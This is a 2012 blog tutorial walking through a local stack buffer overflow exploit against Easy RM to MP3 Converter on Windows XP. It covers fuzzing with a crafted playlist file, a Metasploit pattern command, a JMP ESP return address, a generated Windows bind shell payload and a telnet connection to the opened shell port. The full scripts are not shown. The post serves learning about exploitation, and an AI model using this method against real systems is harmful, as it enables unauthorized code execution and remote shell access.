=======================================================

Monday, September 24, 2012

Buffer Overflow: Local Exploit (Easy RM 2 MP3 Converter)

Now, i will try to trial a local exploitation. Aplication which use for exploition is easy rm to mp3 converter. Tools which use:
a. Ollydbg
b. Python
c. Aplication ( easy rm to mp3 converter ).

  NOTE :

# each change fuzzer script, must be save and running again.

( python <file.py> )



Let's to do this job :
1. Running windows xp and install easy rm to mp3 converter.


2. Create Fuzzer file with python script to create file playlist ( .m3u, .pls etc ).
      ==> running file Fuzz.py ==> # python Fuzz.py


==> create file (playlist file) fuzzer.

 
3. Running aplication and try load file playlist (crash.pls) .
     ==> If fuzzer succes apliaction will be crash ( close automaticly ).


4. Running again aplication and ollydbg to see overwrited register.


==> Result EBX and ESP overwrited with character "B".

5. Create pattern ==> with metasploit ==> ./create_pattern 60000 > file.txt


6. Modify fuzzer script with pattern.


6. Looking for offset position.


7. Check position of EIP register ==> \xEF\xBE\xAD\xDE

 

==> Running python <file>.py


8. Looking for JUMP ESP address


==> JUMP ESP address => 7CA7A787 => ( little endian ) =>\x87\xA7\xA7\x7C

9. Generate payload with msfweb ==> Windows Bind Shell 

 

 ==> Generate payload


9. Modify Fuzzer script with payload.


10.Running fuzzer script to create final playlist file with payload content.





==> Running telnet => # telnet 192.168.56.101 4444


 == DONE ==


===================================================================================
===================================================================================
Time

No comments:

Post a Comment

Subscribe to: Post Comments (Atom) 

==========================================================================
==========================================================================
                                                                
IIIIIIIIII   SSSSSSSSSSSSSSS  222222222222222           CCCCCCCCCCCCC
I::::::::I SS:::::::::::::::S2:::::::::::::::22      CCC::::::::::::C
I::::::::IS:::::SSSSSS::::::S2::::::222222:::::2   CC:::::::::::::::C
II::::::IIS:::::S     SSSSSSS2222222     2:::::2  C:::::CCCCCCCC::::C
  I::::I  S:::::S                        2:::::2 C:::::C       CCCCCC
  I::::I  S:::::S                        2:::::2C:::::C              
  I::::I   S::::SSSS                  2222::::2 C:::::C              
  I::::I    SS::::::SSSSS        22222::::::22  C:::::C              
  I::::I      SSS::::::::SS    22::::::::222    C:::::C              
  I::::I         SSSSSS::::S  2:::::22222       C:::::C              
  I::::I              S:::::S2:::::2            C:::::C              
  I::::I              S:::::S2:::::2             C:::::C       CCCCCC
II::::::IISSSSSSS     S:::::S2:::::2       222222 C:::::CCCCCCCC::::C
I::::::::IS::::::SSSSSS:::::S2::::::2222222:::::2  CC:::::::::::::::C
I::::::::IS:::::::::::::::SS 2::::::::::::::::::2    CCC::::::::::::C
IIIIIIIIII SSSSSSSSSSSSSSS   22222222222222222222       CCCCCCCCCCCCC
                                                                   
==========================================================================
==========================================================================

My Classmate

Show All 

==========================================================================
        (        )      )          (    (           (     
  *   ) )\ )  ( /(   ( /(   (      )\ ) )\ )        )\ )  
` )  /((()/(  )\())  )\())  )\    (()/((()/(   (   (()/(  
 ( )(_))/(_))((_)\  ((_)\((((_)(   /(_))/(_))  )\   /(_)) 
(_(_())(_)) __ ((_)  _((_))\ _ )\ (_)) (_))_  ((_) (_))   
|_   _|| _ \\ \ / / | || |(_)_\(_)| _ \ |   \ | __|| _ \  
  | |  |   / \ V /  | __ | / _ \  |   / | |) || _| |   /  
  |_|  |_|_\  |_|   |_||_|/_/ \_\ |_|_\ |___/ |___||_|_\  
                                                         
==========================================================================